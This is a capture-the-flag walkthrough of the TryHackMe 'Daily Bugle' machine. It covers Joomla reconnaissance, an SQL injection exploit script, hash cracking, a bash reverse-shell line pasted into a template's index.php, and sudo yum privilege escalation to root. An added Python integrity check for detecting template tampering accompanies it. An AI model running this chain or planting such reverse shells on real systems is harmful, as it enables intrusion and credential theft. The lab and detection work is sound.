Daily Bugle — TryHackMe

Charchit Chauhan
5 min read · Sep 22, 2021

Target: 10.10.234.9

A walkthrough of the Daily Bugle machine on TryHackMe, which runs Joomla CMS, focusing on SQL injection and privilege escalation.

So let’s start with our Nmap scan,

nmap 10.10.234.9 -sCV -O -p0-5000

(-sCV for the default NSE scripts and version detection of the services on discovered ports, -O for OS detection, and -p for scanning the port range 0-5000)

Our Nmap scan found ports 22, 80 and 3306 open; interestingly, port 80 is running Joomla CMS.

Opening the URL in a web browser shows what’s running on port 80, and here is the answer to our first question, “who robs the bank?”

We’ll go ahead and bruteforce directories on the target using Gobuster,

gobuster dir -u 10.10.234.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

(dir for directory bruteforcing, -u for the target URL, -w for the wordlist file)

The scan has discovered some directories; we’ll go ahead and check out /administrator in our browser.

It shows an admin login panel to manage the Joomla CMS, but we don’t have the credentials right now.

Running a scan using Joomscan gives us more information on the CMS,

joomscan -u 10.10.234.9

(-u for URL)

It was able to detect the version of the running CMS, which is the answer to our second question.

If you research this version using searchsploit, the Metasploit framework, Rapid7 or Exploit-DB, you’ll find it is vulnerable to SQL injection (SQLi). We could use sqlmap or msfconsole to exploit it, but we’ll go ahead and look for a Python script on the internet instead.

Here’s the one I’m going to use https://github.com/stefanlucas/Exploit-Joomla

python joomla.py http://10.10.234.9/

(you can copy/paste the script and rename the file, or just download the file from GitHub and use it right away)

The script exploited the target and dumped some credentials: a username ‘jonah’ and a hashed password.

We’ll now grab the hashed password and try cracking it using hashcat

hashcat -m 3200 hash.txt /home/kali/Documents/rockyou.txt

(-m for the hash mode, hash.txt contains the hash we found, and rockyou is a very popular wordlist)

And finally we have our cracked password.

You can use hash-identifier to identify the hash type and then look up the matching mode in a Hashcat cheatsheet. Hashcat may take some time to crack the hash depending on how powerful the CPU or GPU in your local machine is, so please be patient while it runs.

We’ll use the username ‘jonah’ and the cracked password to log in to the Joomla CMS admin page.

Clicking on templates in the left sidebar gives us two templates available,

Let’s go for the first one named “Beez3 Details & Files”

Now we can see all the PHP files; click on index.php.

We need a PHP reverse shell to get a connection from the target back to our local machine, so look for one on the internet. I’m using this one here:

exec("/bin/bash -c 'bash -i >& /dev/tcp/YOURLOCALIP/PORT 0>&1'");

Don’t forget to put in your local IP address and a port number, then paste the line into index.php and click the ‘Save’ button.

Start a netcat listener on your local machine,

nc -lvnp 1234

(-l, -v, -n and -p for listen, verbose, no DNS lookup and port number respectively)

Clicking on ‘Template preview’ in the CMS gives us a reverse shell on our listener.
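A defender-side counterpart to the template edit above, added here and not part of the original post: a SHA-256 manifest of the Joomla templates tree, taken after a clean install and re-checked on a schedule, flags exactly the kind of write to index.php the walkthrough performs. The directory layout and file contents are constructed for the demo.

```python
"""Baseline-and-diff integrity check for a Joomla templates tree (added example)."""
import hashlib
import json
import tempfile
from pathlib import Path


def build_manifest(root):
    """Map each PHP file under root (path relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*.php"))
    }


def diff_manifest(baseline, current):
    """Compare two manifests; every entry returned is a change a deployment must explain."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Stand up a constructed templates tree, baseline it, then replay an admin-UI edit."""
    root = Path(tempfile.mkdtemp())
    tpl = root / "templates" / "beez3"
    tpl.mkdir(parents=True)
    (tpl / "index.php").write_text("<?php echo 'Daily Bugle'; ?>\n")
    (tpl / "error.php").write_text("<?php echo 'error'; ?>\n")
    baseline = build_manifest(root)  # taken right after a clean install
    # What the template editor write looks like on disk: index.php is rewritten,
    # and a variant of the same abuse drops a new PHP file next to it.
    (tpl / "index.php").write_text("<?php /* injected code */ echo 'Daily Bugle'; ?>\n")
    (tpl / "dropped.php").write_text("<?php /* new file */ ?>\n")
    return diff_manifest(baseline, build_manifest(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it against the real templates/ directory by calling build_manifest on a freshly deployed site, storing the result, and diffing later manifests against it; an unplanned entry under "modified" or "added" is the alert.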

Check the username using ‘id’; we are ‘apache’.

Using ‘ls’ to list the files in the directory, we can take a look at ‘configuration.php’ with ‘cat’, which gives us some credentials for the ‘root’ user.

Let’s check out /etc/passwd for usernames,

We can see that ‘root’ and ‘jjameson’ are the two real user accounts on this machine.

Using ‘su’ to switch over to ‘jjameson’ with the password we just found in configuration.php, and then ‘sudo -l’ to list the commands user ‘jjameson’ may run, we can see ‘yum’ is there.

‘yum’ run through sudo is exploitable; look for exploits on the internet. I’m using this one from GTFOBins.

Go ahead and use those commands to spawn an interactive root shell, then check the username using ‘id’.

We are finally ‘root’. Using ‘cd’ to check the home directory of ‘jjameson’, we find user.txt, which contains our user flag, and checking the ‘root’ directory, we find root.txt, which contains our root flag.

The challenge is now complete.

Thank you for reading! :)
